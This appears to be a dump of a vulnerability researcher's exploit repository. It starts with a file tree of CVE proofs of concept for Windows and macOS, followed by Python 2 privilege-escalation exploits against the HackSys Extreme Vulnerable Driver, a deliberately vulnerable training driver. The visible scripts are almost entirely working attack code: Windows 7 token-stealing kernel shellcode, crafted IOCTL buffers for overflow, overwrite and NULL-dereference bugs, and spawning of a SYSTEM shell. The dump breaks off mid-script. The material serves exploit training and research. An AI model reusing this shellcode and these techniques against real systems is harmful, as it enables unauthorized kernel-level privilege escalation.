├── .gitignore ├── HEVD ├── hacksysAO.py ├── hacksysBOF.py ├── hacksysBOFGS.py ├── hacksysINT.py ├── hacksysNULL.py ├── hacksysPOOL-kex.py ├── hacksysPOOL.py ├── hacksysTYPE.py ├── hacksysUAF.py ├── hacksysUIHEAP.py └── hacksysUISTACK.py ├── cve-2015-8285_Quick_Heal_16_webssx.sys └── qh-webssx-bsod.py ├── cve-2019-20057_proxyman_privhelper └── PMCocoa │ ├── PMCocoa.xcodeproj │ ├── project.pbxproj │ ├── project.xcworkspace │ │ ├── contents.xcworkspacedata │ │ ├── xcshareddata │ │ │ └── IDEWorkspaceChecks.plist │ │ └── xcuserdata │ │ │ └── csaby.xcuserdatad │ │ │ └── UserInterfaceState.xcuserstate │ └── xcuserdata │ │ └── csaby.xcuserdatad │ │ └── xcschemes │ │ └── xcschememanagement.plist │ └── PMCocoa │ ├── AppDelegate.h │ ├── AppDelegate.m │ ├── Assets.xcassets │ ├── AppIcon.appiconset │ │ └── Contents.json │ └── Contents.json │ ├── Base.lproj │ └── Main.storyboard │ ├── Info.plist │ ├── PMCocoa.entitlements │ ├── ViewController.h │ ├── ViewController.m │ └── main.m ├── cve-2020-14974_iobit_unlocker └── UnlockExploit │ ├── UnlockExploit.sln │ ├── UnlockExploit │ ├── UnlockExploit.cpp │ ├── UnlockExploit.vcxproj │ ├── UnlockExploit.vcxproj.filters │ └── UnlockExploit.vcxproj.user │ └── x64 │ └── Release │ └── UnlockExploit.exe ├── cve-2021-1784_tcc_bypass_hdiutil ├── cve-2021-1784_tcc_bypass_hdiutil.mov └── tccbypass.py ├── cve-2021-1815_macos_cfprefsd_lpe └── prefs.m ├── cve-2021-30782_tcc_apptranslocation ├── xpctrans.c └── xpctrans.mov ├── cve-2022-22655_macos_tcc_adminconfig_bypass ├── bypass-config.sh └── poc-admintcc-bypass.sh └── cve-2023-32413-chmodfd └── chmodfd.c /.gitignore: -------------------------------------------------------------------------------- 1 | 2 | IOBit Unlocker 1.2 LPE/.DS_Store 3 | .DS_Store 4 | -------------------------------------------------------------------------------- /HEVD/hacksysAO.py: -------------------------------------------------------------------------------- 1 | from ctypes import * 2 | from ctypes.wintypes import * 3 | 
import struct, os 4 | import platform 5 | 6 | GENERIC_READ = 0x80000000 7 | GENERIC_WRITE = 0x40000000 8 | OPEN_EXISTING = 0x3 9 | 10 | MEM_COMMIT = 0x00001000 11 | MEM_RESERVE = 0x00002000 12 | PAGE_EXECUTE_READWRITE = 0x00000040 13 | STATUS_SUCCESS = 0 14 | 15 | METHOD_NEITHER = 0x3 16 | FILE_ANY_ACCESS = 0x0 17 | FILE_DEVICE_UNKNOWN = 0x00000022 18 | 19 | 20 | kernel32 = windll.kernel32 21 | ntdll = windll.ntdll 22 | Psapi = windll.Psapi 23 | 24 | def ctl_code(function, 25 | devicetype = FILE_DEVICE_UNKNOWN, 26 | access = FILE_ANY_ACCESS, 27 | method = METHOD_NEITHER): 28 | """Recreate CTL_CODE macro to generate driver IOCTL""" 29 | return ((devicetype << 16) | (access << 14) | (function << 2) | method) 30 | 31 | def alloc_memory(base_address, input, input_size): 32 | """ 33 | Allocate input buffer 34 | """ 35 | print "[*] Allocating input buffer at %s" % hex(base_address) 36 | base_address_c = c_int(base_address) 37 | input_size_c = c_int(input_size) 38 | ntdll.NtAllocateVirtualMemory.argtypes = [c_int, 39 | POINTER(c_int), 40 | c_ulong, 41 | POINTER(c_int), 42 | c_int, 43 | c_int] 44 | dwStatus = ntdll.NtAllocateVirtualMemory(0xFFFFFFFF, 45 | byref(base_address_c), 46 | 0x0, 47 | byref(input_size_c), 48 | MEM_RESERVE|MEM_COMMIT, 49 | PAGE_EXECUTE_READWRITE) 50 | if dwStatus != STATUS_SUCCESS: 51 | print "[-] Error while allocating memory: %s" % dwStatus 52 | getLastError() 53 | sys.exit() 54 | written = c_ulong() 55 | alloc = kernel32.WriteProcessMemory(0xFFFFFFFF, base_address, input, len(input), byref(written)) 56 | if alloc == 0: 57 | print "[-] Error while writing our input buffer memory: %s" % alloc 58 | getLastError() 59 | sys.exit() 60 | 61 | def tokenstealingx86(RETVAL, extra = ""): 62 | """ 63 | Retrun a token stealing shellcode 64 | """ 65 | #Windows 7 SP1 x86 66 | KPROCESS = '\x50' 67 | TOKEN = '\xF8' 68 | UPID = '\xB4' 69 | APLINKS = '\xB8' 70 | 71 | shellcode = ( 72 | "\x60" # pushad 73 | "\x33\xc0" # xor eax,eax 74 | 
"\x64\x8b\x80\x24\x01\x00\x00" # mov eax,DWORD PTR fs:[eax+0x124] 75 | "\x8b\x40" + KPROCESS + # mov eax,DWORD PTR [eax+_KPROCESS] 76 | "\x8b\xc8" # mov ecx,eax 77 | "\x8b\x80" + APLINKS + "\x00\x00\x00" # mov eax,DWORD PTR [eax+APLINKS] 78 | "\x2d" + APLINKS + "\x00\x00\x00" # sub eax,APLINKS 79 | "\x83\xb8" + UPID + "\x00\x00\x00\x04" # cmp DWORD PTR [eax+UPID],0x4 80 | "\x75\xec" # jne 0xe 81 | "\x8b\x90" + TOKEN + "\x00\x00\x00" # mov edx,DWORD PTR [eax+TOKEN] 82 | "\x89\x91" + TOKEN + "\x00\x00\x00" # mov DWORD PTR [ecx+TOKEN],edx 83 | "\x61" # popad 84 | ) 85 | 86 | shellcode += extra #append extra code after token stealing shellcode, e.g.: restore stack 87 | 88 | if RETVAL == "": 89 | shellcode += "\xc3" #retn 90 | else: 91 | shellcode += "\xc2" + RETVAL + "\x00" # ret 0x8 92 | 93 | return shellcode 94 | 95 | def find_driver_base(driver=None): 96 | #https://github.com/zeroSteiner/mayhem/blob/master/mayhem/exploit/windows.py 97 | if platform.architecture()[0] == '64bit': 98 | lpImageBase = (c_ulonglong * 1024)() 99 | lpcbNeeded = c_longlong() 100 | Psapi.GetDeviceDriverBaseNameA.argtypes = [c_longlong, POINTER(c_char), c_uint32] 101 | else: 102 | lpImageBase = (c_ulong * 1024)() 103 | lpcbNeeded = c_long() 104 | driver_name_size = c_long() 105 | driver_name_size.value = 48 106 | Psapi.EnumDeviceDrivers(byref(lpImageBase), c_int(1024), byref(lpcbNeeded)) 107 | for base_addr in lpImageBase: 108 | driver_name = c_char_p('\x00' * driver_name_size.value) 109 | if base_addr: 110 | Psapi.GetDeviceDriverBaseNameA(base_addr, driver_name, driver_name_size.value) 111 | if driver == None and driver_name.value.lower().find("krnl") != -1: 112 | print "[+] Retrieving kernel info..." 113 | print "[+] Kernel version:", driver_name.value 114 | print "[+] Kernel base address: %s" % hex(base_addr) 115 | return (base_addr, driver_name.value) 116 | elif driver_name.value.lower() == driver: 117 | print "[+] Retrieving %s info..." 
% driver_name 118 | print "[+] %s base address: %s" % (driver_name, hex(base_addr)) 119 | return (base_addr, driver_name.value) 120 | return None 121 | 122 | def get_haldispatchtable(): 123 | #https://github.com/zeroSteiner/mayhem/blob/master/mayhem/exploit/windows.py 124 | if platform.architecture()[0] == '64bit': 125 | kernel32.LoadLibraryExA.restype = c_uint64 126 | kernel32.GetProcAddress.argtypes = [c_uint64, POINTER(c_char)] 127 | kernel32.GetProcAddress.restype = c_uint64 128 | (krnlbase, kernelver) = find_driver_base() 129 | hKernel = kernel32.LoadLibraryExA(kernelver, 0, 1) 130 | HalDispatchTable = kernel32.GetProcAddress(hKernel, 'HalDispatchTable') 131 | HalDispatchTable -= hKernel 132 | HalDispatchTable += krnlbase 133 | print "[+] HalDispatchTable address:", hex(HalDispatchTable) 134 | return HalDispatchTable 135 | 136 | if __name__ == '__main__': 137 | print "[*] HackSysExtremeVulnerableDriver Arbitrary Overwrite privilige escalation" 138 | 139 | IOCTL_VULN = 0x0022200b # 140 | DEVICE_NAME = "\\\\.\\HackSysExtremeVulnerableDriver" 141 | dwReturn = c_ulong() 142 | driver_handle = kernel32.CreateFileA(DEVICE_NAME, GENERIC_READ | GENERIC_WRITE, 0, None, OPEN_EXISTING, 0, None) 143 | 144 | #allocate input memory 145 | HALDISPATCH = get_haldispatchtable() 146 | HalDispatchTable0x4 = HALDISPATCH + 0x4 147 | size = 0x1000 148 | input = "\x08\x00\x41\x41" #address containing the address of the shellcode 149 | input += struct.pack("L", HalDispatchTable0x4) #HALDISPATCH 150 | input += "\x42\x42\x42\x42" #address of the shellcode 151 | input += "\x42" * (size - len(input)) 152 | alloc_memory(0x41410000, input, size) 153 | 154 | #allocate shellcode in memory 155 | SHELLCODE = tokenstealingx86(RETVAL = "") 156 | stuff = "\x90" * 0x10 + SHELLCODE + "\x90" * (0x1000 - 0x10 - len(SHELLCODE)) 157 | alloc_memory(0x42424242, stuff, 0x1000) 158 | 159 | inputbuffer = 0x41410000 #memory address of the input buffer 160 | inputbuffer_size = 0x1000 161 | outputbuffer_size = 
0x0 162 | IoStatusBlock = c_ulong() 163 | if driver_handle: 164 | print "[*] Sending IOCTL and data to the driver..." 165 | dev_ioctl = ntdll.ZwDeviceIoControlFile(driver_handle, 166 | None, 167 | None, 168 | None, 169 | byref(IoStatusBlock), 170 | IOCTL_VULN, 171 | inputbuffer, 172 | inputbuffer_size, 173 | None, 174 | 0x0 175 | ) 176 | ## Trigger shellcode 177 | inp = c_ulong() 178 | out = c_ulong() 179 | inp = 0x1337 180 | tmp = ntdll.NtQueryIntervalProfile(inp, byref(out)) 181 | 182 | if 'system' in os.popen('whoami').read(): 183 | print "[+] Getting system shell..." 184 | os.system("cmd.exe") 185 | else: 186 | print '[-] Failed to elevate privileges' 187 | -------------------------------------------------------------------------------- /HEVD/hacksysBOF.py: -------------------------------------------------------------------------------- 1 | from ctypes import * 2 | from ctypes.wintypes import * 3 | import os 4 | 5 | GENERIC_READ = 0x80000000 6 | GENERIC_WRITE = 0x40000000 7 | OPEN_EXISTING = 0x3 8 | 9 | MEM_COMMIT = 0x00001000 10 | MEM_RESERVE = 0x00002000 11 | PAGE_EXECUTE_READWRITE = 0x00000040 12 | STATUS_SUCCESS = 0 13 | 14 | kernel32 = windll.kernel32 15 | ntdll = windll.ntdll 16 | 17 | def alloc_memory(base_address, input, input_size): 18 | """ 19 | Allocate input buffer 20 | """ 21 | print "[*] Allocating input buffer at %s" % hex(base_address) 22 | base_address_c = c_int(base_address) 23 | input_size_c = c_int(input_size) 24 | ntdll.NtAllocateVirtualMemory.argtypes = [c_int, 25 | POINTER(c_int), 26 | c_ulong, 27 | POINTER(c_int), 28 | c_int, 29 | c_int] 30 | dwStatus = ntdll.NtAllocateVirtualMemory(0xFFFFFFFF, 31 | byref(base_address_c), 32 | 0x0, 33 | byref(input_size_c), 34 | MEM_RESERVE|MEM_COMMIT, 35 | PAGE_EXECUTE_READWRITE) 36 | if dwStatus != STATUS_SUCCESS: 37 | print "[-] Error while allocating memory: %s" % dwStatus 38 | getLastError() 39 | sys.exit() 40 | written = c_ulong() 41 | alloc = kernel32.WriteProcessMemory(0xFFFFFFFF, base_address, 
input, len(input), byref(written)) 42 | if alloc == 0: 43 | print "[-] Error while writing our input buffer memory: %s" % alloc 44 | getLastError() 45 | sys.exit() 46 | 47 | def tokenstealingx86(RETVAL, extra = ""): 48 | """ 49 | Retrun a token stealing shellcode 50 | """ 51 | #Windows 7 SP1 x86 52 | KPROCESS = '\x50' 53 | TOKEN = '\xF8' 54 | UPID = '\xB4' 55 | APLINKS = '\xB8' 56 | 57 | shellcode = ( 58 | "\x60" # pushad 59 | "\x33\xc0" # xor eax,eax 60 | "\x64\x8b\x80\x24\x01\x00\x00" # mov eax,DWORD PTR fs:[eax+0x124] 61 | "\x8b\x40" + KPROCESS + # mov eax,DWORD PTR [eax+_KPROCESS] 62 | "\x8b\xc8" # mov ecx,eax 63 | "\x8b\x80" + APLINKS + "\x00\x00\x00" # mov eax,DWORD PTR [eax+APLINKS] 64 | "\x2d" + APLINKS + "\x00\x00\x00" # sub eax,APLINKS 65 | "\x83\xb8" + UPID + "\x00\x00\x00\x04" # cmp DWORD PTR [eax+UPID],0x4 66 | "\x75\xec" # jne 0xe 67 | "\x8b\x90" + TOKEN + "\x00\x00\x00" # mov edx,DWORD PTR [eax+TOKEN] 68 | "\x89\x91" + TOKEN + "\x00\x00\x00" # mov DWORD PTR [ecx+TOKEN],edx 69 | "\x61" # popad 70 | ) 71 | 72 | shellcode += extra #append extra code after token stealing shellcode, e.g.: restore stack 73 | 74 | if RETVAL == "": 75 | shellcode += "\xc3" #retn 76 | else: 77 | shellcode += "\xc2" + RETVAL + "\x00" # ret 0x8 78 | 79 | return shellcode 80 | 81 | if __name__ == '__main__': 82 | print "[*] HackSysExtremeVulnerableDriver Stack Buffer Overflow privilige escalation" 83 | 84 | IOCTL_VULN = 0x00222003 85 | DEVICE_NAME = "\\\\.\\HackSysExtremeVulnerableDriver" 86 | dwReturn = c_ulong() 87 | driver_handle = kernel32.CreateFileA(DEVICE_NAME, GENERIC_READ | GENERIC_WRITE, 0, None, OPEN_EXISTING, 0, None) 88 | 89 | #allocate input memory 90 | alloc_memory(0x41410000, "\x42" * 0x824, 0x824) 91 | 92 | #allocate shellcode in memory 93 | SHELLCODE = tokenstealingx86(RETVAL = '\x08', extra = '\x33\xc0\x5D') 94 | stuff = "\x90" * 0x10 + SHELLCODE + "\x90" * (0x1000 - 0x10 - len(SHELLCODE)) 95 | alloc_memory(0x42424242, stuff, 0x1000) 96 | 97 | inputbuffer = 
0x41410000 #memory address of the input buffer 98 | inputbuffer_size = 0x824 99 | outputbuffer_size = 0x0 100 | IoStatusBlock = c_ulong() 101 | if driver_handle: 102 | print "[*] Sending IOCTL and data to the driver..." 103 | dev_ioctl = ntdll.ZwDeviceIoControlFile(driver_handle, 104 | None, 105 | None, 106 | None, 107 | byref(IoStatusBlock), 108 | IOCTL_VULN, 109 | inputbuffer, 110 | inputbuffer_size, 111 | None, 112 | 0x0 113 | ) 114 | if 'system' in os.popen('whoami').read(): 115 | print "[+] Getting system shell..." 116 | os.system("cmd.exe") 117 | else: 118 | print '[-] Failed to elevate privileges' -------------------------------------------------------------------------------- /HEVD/hacksysBOFGS.py: -------------------------------------------------------------------------------- 1 | from ctypes import * 2 | from ctypes.wintypes import * 3 | import os 4 | 5 | GENERIC_READ = 0x80000000 6 | GENERIC_WRITE = 0x40000000 7 | OPEN_EXISTING = 0x3 8 | 9 | MEM_COMMIT = 0x00001000 10 | MEM_RESERVE = 0x00002000 11 | PAGE_EXECUTE_READWRITE = 0x00000040 12 | STATUS_SUCCESS = 0 13 | 14 | METHOD_NEITHER = 0x3 15 | FILE_ANY_ACCESS = 0x0 16 | FILE_DEVICE_UNKNOWN = 0x00000022 17 | 18 | 19 | kernel32 = windll.kernel32 20 | ntdll = windll.ntdll 21 | 22 | def ctl_code(function, 23 | devicetype = FILE_DEVICE_UNKNOWN, 24 | access = FILE_ANY_ACCESS, 25 | method = METHOD_NEITHER): 26 | """Recreate CTL_CODE macro to generate driver IOCTL""" 27 | return ((devicetype << 16) | (access << 14) | (function << 2) | method) 28 | 29 | def alloc_memory(base_address, input, input_size): 30 | """ 31 | Allocate input buffer 32 | """ 33 | print "[*] Allocating input buffer at %s" % hex(base_address) 34 | base_address_c = c_int(base_address) 35 | input_size_c = c_int(input_size) 36 | ntdll.NtAllocateVirtualMemory.argtypes = [c_int, 37 | POINTER(c_int), 38 | c_ulong, 39 | POINTER(c_int), 40 | c_int, 41 | c_int] 42 | dwStatus = ntdll.NtAllocateVirtualMemory(0xFFFFFFFF, 43 | byref(base_address_c), 44 | 
0x0, 45 | byref(input_size_c), 46 | MEM_RESERVE|MEM_COMMIT, 47 | PAGE_EXECUTE_READWRITE) 48 | if dwStatus != STATUS_SUCCESS: 49 | print "[-] Error while allocating memory: %s" % dwStatus 50 | getLastError() 51 | sys.exit() 52 | written = c_ulong() 53 | alloc = kernel32.WriteProcessMemory(0xFFFFFFFF, base_address, input, len(input), byref(written)) 54 | if alloc == 0: 55 | print "[-] Error while writing our input buffer memory: %s" % alloc 56 | getLastError() 57 | sys.exit() 58 | 59 | def tokenstealingx86(RETVAL, extra = ""): 60 | """ 61 | Retrun a token stealing shellcode 62 | """ 63 | #Windows 7 SP1 x86 64 | KPROCESS = '\x50' 65 | TOKEN = '\xF8' 66 | UPID = '\xB4' 67 | APLINKS = '\xB8' 68 | 69 | shellcode = ( 70 | "\x60" # pushad 71 | "\x33\xc0" # xor eax,eax 72 | "\x64\x8b\x80\x24\x01\x00\x00" # mov eax,DWORD PTR fs:[eax+0x124] 73 | "\x8b\x40" + KPROCESS + # mov eax,DWORD PTR [eax+_KPROCESS] 74 | "\x8b\xc8" # mov ecx,eax 75 | "\x8b\x80" + APLINKS + "\x00\x00\x00" # mov eax,DWORD PTR [eax+APLINKS] 76 | "\x2d" + APLINKS + "\x00\x00\x00" # sub eax,APLINKS 77 | "\x83\xb8" + UPID + "\x00\x00\x00\x04" # cmp DWORD PTR [eax+UPID],0x4 78 | "\x75\xec" # jne 0xe 79 | "\x8b\x90" + TOKEN + "\x00\x00\x00" # mov edx,DWORD PTR [eax+TOKEN] 80 | "\x89\x91" + TOKEN + "\x00\x00\x00" # mov DWORD PTR [ecx+TOKEN],edx 81 | "\x61" # popad 82 | ) 83 | 84 | shellcode += extra #append extra code after token stealing shellcode, e.g.: restore stack 85 | 86 | if RETVAL == "": 87 | shellcode += "\xc3" #retn 88 | else: 89 | shellcode += "\xc2" + RETVAL + "\x00" # ret 0x8 90 | 91 | return shellcode 92 | 93 | 94 | if __name__ == '__main__': 95 | print "[*] HackSysExtremeVulnerableDriver Stack BoF w/ GS privilige escalation" 96 | 97 | IOCTL_VULN = ctl_code(0x801) #HACKSYS_EVD_IOCTL_STACK_OVERFLOW_GS 98 | DEVICE_NAME = "\\\\.\\HackSysExtremeVulnerableDriver" 99 | dwReturn = c_ulong() 100 | driver_handle = kernel32.CreateFileA(DEVICE_NAME, GENERIC_READ | GENERIC_WRITE, 0, None, OPEN_EXISTING, 0, 
None) 101 | 102 | #allocate input memory, a full page (4096 bytes) 103 | alloc_memory(0x41410000, "\x42" * 0x1000, 0x1000) 104 | 105 | #allocate shellcode in memory 106 | """ 107 | extra code needed to restore stack and other data at the end of the token stealing shellcode in order to able to continue: 108 | 0: 81 c4 8c 07 00 00 add esp,0x78c ; offset for IRP 109 | 6: 8b 3c 24 mov edi,DWORD PTR [esp] ; restore IRP 110 | 9: 83 c4 08 add esp,0x8 ; offset for DbgPrint info 111 | c: 8b 1c 24 mov ebx,DWORD PTR [esp] ; ebx is needed for DbGPrint 112 | f: 81 c4 34 02 00 00 add esp,0x234 ; align back stack to move to IOCompletion 113 | 15: 31 c0 xor eax,eax 114 | 17: 5d pop ebp ; restore EBP 115 | """ 116 | #return value is 0x8 as that is what is used by the function 117 | SHELLCODE = tokenstealingx86(RETVAL = '\x08', extra = '\x81\xC4\x8c\x07\x00\x00\x8B\x3C\x24\x83\xC4\x08\x8B\x1C\x24\x81\xC4\x34\x02\x00\x00\x31\xC0\x5D') 118 | stuff = "\x90" * 0x10 + SHELLCODE + "\x90" * (0x1000 - 0x10 - len(SHELLCODE)) 119 | alloc_memory(0x42424242, stuff, 0x1000) 120 | 121 | #0x214 is the offset to overwrite the exception handler 122 | #once it's overwritten we will cause a PAGE_FAULT as only 0x41410000 page is allocated 123 | #we start to read from close to the end of the page 124 | inputbuffer = 0x41410000 + 0x1000 - 0x214 #memory address of the input buffer 125 | inputbuffer_size = 0x218 #this will guarantee that we cause a page fault 126 | outputbuffer_size = 0x0 127 | IoStatusBlock = c_ulong() 128 | if driver_handle: 129 | print "[*] Sending IOCTL and data to the driver..." 130 | dev_ioctl = ntdll.ZwDeviceIoControlFile(driver_handle, 131 | None, 132 | None, 133 | None, 134 | byref(IoStatusBlock), 135 | IOCTL_VULN, 136 | inputbuffer, 137 | inputbuffer_size, 138 | None, 139 | 0x0 140 | ) 141 | if 'system' in os.popen('whoami').read(): 142 | print "[+] Getting system shell..." 
143 | os.system("cmd.exe") 144 | else: 145 | print '[-] Failed to elevate privileges' -------------------------------------------------------------------------------- /HEVD/hacksysINT.py: -------------------------------------------------------------------------------- 1 | from ctypes import * 2 | from ctypes.wintypes import * 3 | import os 4 | import struct 5 | 6 | GENERIC_READ = 0x80000000 7 | GENERIC_WRITE = 0x40000000 8 | OPEN_EXISTING = 0x3 9 | 10 | MEM_COMMIT = 0x00001000 11 | MEM_RESERVE = 0x00002000 12 | PAGE_EXECUTE_READWRITE = 0x00000040 13 | STATUS_SUCCESS = 0 14 | 15 | METHOD_NEITHER = 0x3 16 | FILE_ANY_ACCESS = 0x0 17 | FILE_DEVICE_UNKNOWN = 0x00000022 18 | 19 | 20 | kernel32 = windll.kernel32 21 | ntdll = windll.ntdll 22 | 23 | def ctl_code(function, 24 | devicetype = FILE_DEVICE_UNKNOWN, 25 | access = FILE_ANY_ACCESS, 26 | method = METHOD_NEITHER): 27 | """Recreate CTL_CODE macro to generate driver IOCTL""" 28 | return ((devicetype << 16) | (access << 14) | (function << 2) | method) 29 | 30 | def alloc_memory(base_address, input, input_size): 31 | """ 32 | Allocate input buffer 33 | """ 34 | print "[*] Allocating input buffer at %s" % hex(base_address) 35 | base_address_c = c_int(base_address) 36 | input_size_c = c_int(input_size) 37 | ntdll.NtAllocateVirtualMemory.argtypes = [c_int, 38 | POINTER(c_int), 39 | c_ulong, 40 | POINTER(c_int), 41 | c_int, 42 | c_int] 43 | dwStatus = ntdll.NtAllocateVirtualMemory(0xFFFFFFFF, 44 | byref(base_address_c), 45 | 0x0, 46 | byref(input_size_c), 47 | MEM_RESERVE|MEM_COMMIT, 48 | PAGE_EXECUTE_READWRITE) 49 | if dwStatus != STATUS_SUCCESS: 50 | print "[-] Error while allocating memory: %s" % dwStatus 51 | getLastError() 52 | sys.exit() 53 | written = c_ulong() 54 | alloc = kernel32.WriteProcessMemory(0xFFFFFFFF, base_address, input, len(input), byref(written)) 55 | if alloc == 0: 56 | print "[-] Error while writing our input buffer memory: %s" % alloc 57 | getLastError() 58 | sys.exit() 59 | 60 | def 
tokenstealingx86(RETVAL, extra = ""): 61 | """ 62 | Retrun a token stealing shellcode 63 | """ 64 | #Windows 7 SP1 x86 65 | KPROCESS = '\x50' 66 | TOKEN = '\xF8' 67 | UPID = '\xB4' 68 | APLINKS = '\xB8' 69 | 70 | shellcode = ( 71 | "\x60" # pushad 72 | "\x33\xc0" # xor eax,eax 73 | "\x64\x8b\x80\x24\x01\x00\x00" # mov eax,DWORD PTR fs:[eax+0x124] 74 | "\x8b\x40" + KPROCESS + # mov eax,DWORD PTR [eax+_KPROCESS] 75 | "\x8b\xc8" # mov ecx,eax 76 | "\x8b\x80" + APLINKS + "\x00\x00\x00" # mov eax,DWORD PTR [eax+APLINKS] 77 | "\x2d" + APLINKS + "\x00\x00\x00" # sub eax,APLINKS 78 | "\x83\xb8" + UPID + "\x00\x00\x00\x04" # cmp DWORD PTR [eax+UPID],0x4 79 | "\x75\xec" # jne 0xe 80 | "\x8b\x90" + TOKEN + "\x00\x00\x00" # mov edx,DWORD PTR [eax+TOKEN] 81 | "\x89\x91" + TOKEN + "\x00\x00\x00" # mov DWORD PTR [ecx+TOKEN],edx 82 | "\x61" # popad 83 | ) 84 | 85 | shellcode += extra #append extra code after token stealing shellcode, e.g.: restore stack 86 | 87 | if RETVAL == "": 88 | shellcode += "\xc3" #retn 89 | else: 90 | shellcode += "\xc2" + RETVAL + "\x00" # ret 0x8 91 | 92 | return shellcode 93 | 94 | if __name__ == '__main__': 95 | print "[*] HackSysExtremeVulnerableDriver integer overflow privilige escalation" 96 | 97 | 98 | IOCTL_VULN = ctl_code(0x809) # 99 | DEVICE_NAME = "\\\\.\\HackSysExtremeVulnerableDriver" 100 | dwReturn = c_ulong() 101 | driver_handle = kernel32.CreateFileA(DEVICE_NAME, GENERIC_READ | GENERIC_WRITE, 0, None, OPEN_EXISTING, 0, None) 102 | 103 | #allocate input 104 | size = 0x1000 105 | input = 0x82c * "\x42" #overwrite return pointer (kernel buffer size = 824) 106 | input += struct.pack("L", 0xBAD0B0B0) #to stop copy 107 | input += (size - len(input)) * "\x42" 108 | alloc_memory(0x41410000, input, size) 109 | 110 | #allocate shellcode in memory 111 | SHELLCODE = tokenstealingx86(RETVAL = '\x08', extra = '\x33\xc0\x5D') 112 | stuff = "\x90" * 0x10 + SHELLCODE + "\x90" * (size - 0x10 - len(SHELLCODE)) 113 | alloc_memory(0x42424242, stuff, size) 114 
| 115 | inputbuffer = 0x41410000 #memory address of the input buffer 116 | inputbuffer_size = 0xffffffff #causing int overflow when checked with +4 117 | outputbuffer_size = 0x0 118 | IoStatusBlock = c_ulong() 119 | if driver_handle: 120 | print "[*] Sending IOCTL and data to the driver..." 121 | dev_ioctl = ntdll.ZwDeviceIoControlFile(driver_handle, 122 | None, 123 | None, 124 | None, 125 | byref(IoStatusBlock), 126 | IOCTL_VULN, 127 | inputbuffer, 128 | inputbuffer_size, 129 | None, 130 | 0x0 131 | ) 132 | 133 | if 'system' in os.popen('whoami').read(): 134 | print "[+] Getting system shell..." 135 | os.system("cmd.exe") 136 | else: 137 | print '[-] Failed to elevate privileges' -------------------------------------------------------------------------------- /HEVD/hacksysNULL.py: -------------------------------------------------------------------------------- 1 | from ctypes import * 2 | from ctypes.wintypes import * 3 | import os 4 | import struct 5 | 6 | GENERIC_READ = 0x80000000 7 | GENERIC_WRITE = 0x40000000 8 | OPEN_EXISTING = 0x3 9 | 10 | MEM_COMMIT = 0x00001000 11 | MEM_RESERVE = 0x00002000 12 | PAGE_EXECUTE_READWRITE = 0x00000040 13 | STATUS_SUCCESS = 0 14 | 15 | METHOD_NEITHER = 0x3 16 | FILE_ANY_ACCESS = 0x0 17 | FILE_DEVICE_UNKNOWN = 0x00000022 18 | 19 | 20 | kernel32 = windll.kernel32 21 | ntdll = windll.ntdll 22 | 23 | def ctl_code(function, 24 | devicetype = FILE_DEVICE_UNKNOWN, 25 | access = FILE_ANY_ACCESS, 26 | method = METHOD_NEITHER): 27 | """Recreate CTL_CODE macro to generate driver IOCTL""" 28 | return ((devicetype << 16) | (access << 14) | (function << 2) | method) 29 | 30 | def alloc_memory(base_address, input, input_size): 31 | """ 32 | Allocate input buffer 33 | """ 34 | print "[*] Allocating input buffer at %s" % hex(base_address) 35 | base_address_c = c_int(base_address) 36 | input_size_c = c_int(input_size) 37 | ntdll.NtAllocateVirtualMemory.argtypes = [c_int, 38 | POINTER(c_int), 39 | c_ulong, 40 | POINTER(c_int), 41 | c_int, 42 | 
c_int] 43 | dwStatus = ntdll.NtAllocateVirtualMemory(0xFFFFFFFF, 44 | byref(base_address_c), 45 | 0x0, 46 | byref(input_size_c), 47 | MEM_RESERVE|MEM_COMMIT, 48 | PAGE_EXECUTE_READWRITE) 49 | if dwStatus != STATUS_SUCCESS: 50 | print "[-] Error while allocating memory: %s" % dwStatus 51 | getLastError() 52 | sys.exit() 53 | written = c_ulong() 54 | alloc = kernel32.WriteProcessMemory(0xFFFFFFFF, base_address, input, len(input), byref(written)) 55 | if alloc == 0: 56 | print "[-] Error while writing our input buffer memory: %s" % alloc 57 | getLastError() 58 | sys.exit() 59 | 60 | def tokenstealingx86(RETVAL, extra = ""): 61 | """ 62 | Retrun a token stealing shellcode 63 | """ 64 | #Windows 7 SP1 x86 65 | KPROCESS = '\x50' 66 | TOKEN = '\xF8' 67 | UPID = '\xB4' 68 | APLINKS = '\xB8' 69 | 70 | shellcode = ( 71 | "\x60" # pushad 72 | "\x33\xc0" # xor eax,eax 73 | "\x64\x8b\x80\x24\x01\x00\x00" # mov eax,DWORD PTR fs:[eax+0x124] 74 | "\x8b\x40" + KPROCESS + # mov eax,DWORD PTR [eax+_KPROCESS] 75 | "\x8b\xc8" # mov ecx,eax 76 | "\x8b\x80" + APLINKS + "\x00\x00\x00" # mov eax,DWORD PTR [eax+APLINKS] 77 | "\x2d" + APLINKS + "\x00\x00\x00" # sub eax,APLINKS 78 | "\x83\xb8" + UPID + "\x00\x00\x00\x04" # cmp DWORD PTR [eax+UPID],0x4 79 | "\x75\xec" # jne 0xe 80 | "\x8b\x90" + TOKEN + "\x00\x00\x00" # mov edx,DWORD PTR [eax+TOKEN] 81 | "\x89\x91" + TOKEN + "\x00\x00\x00" # mov DWORD PTR [ecx+TOKEN],edx 82 | "\x61" # popad 83 | ) 84 | 85 | shellcode += extra #append extra code after token stealing shellcode, e.g.: restore stack 86 | 87 | if RETVAL == "": 88 | shellcode += "\xc3" #retn 89 | else: 90 | shellcode += "\xc2" + RETVAL + "\x00" # ret 0x8 91 | 92 | return shellcode 93 | 94 | if __name__ == '__main__': 95 | print "[*] HackSysExtremeVulnerableDriver NULL pointer dereference privilige escalation" 96 | 97 | 98 | IOCTL_VULN = ctl_code(0x80a) #22202b 99 | DEVICE_NAME = "\\\\.\\HackSysExtremeVulnerableDriver" 100 | dwReturn = c_ulong() 101 | driver_handle = 
kernel32.CreateFileA(DEVICE_NAME, GENERIC_READ | GENERIC_WRITE, 0, None, OPEN_EXISTING, 0, None) 102 | 103 | #allocate crafted input memory w/ shellcode 104 | size = 0x1000 105 | input = struct.pack("L", 0xBAD0B0B1) # dont match "\xb0\xb0\xd0\xba" 106 | SHELLCODE = tokenstealingx86(RETVAL = "") 107 | stuff = "\x90" * 0x10 + SHELLCODE + "\x90" * (size - 0x10 - 0x4 - len(SHELLCODE)) 108 | input += stuff 109 | alloc_memory(0x41410000, input, size) 110 | 111 | #allocate null page 112 | size = 0x1000 113 | input = struct.pack("L", 0x41410004) #shellcode address 114 | input += "\x42" * (size - len(input)) 115 | alloc_memory(0x00000004, input, size) 116 | 117 | inputbuffer = 0x41410000 #memory address of the input buffer 118 | inputbuffer_size = 0x1000 119 | outputbuffer_size = 0x0 120 | IoStatusBlock = c_ulong() 121 | if driver_handle: 122 | print "[*] Sending IOCTL 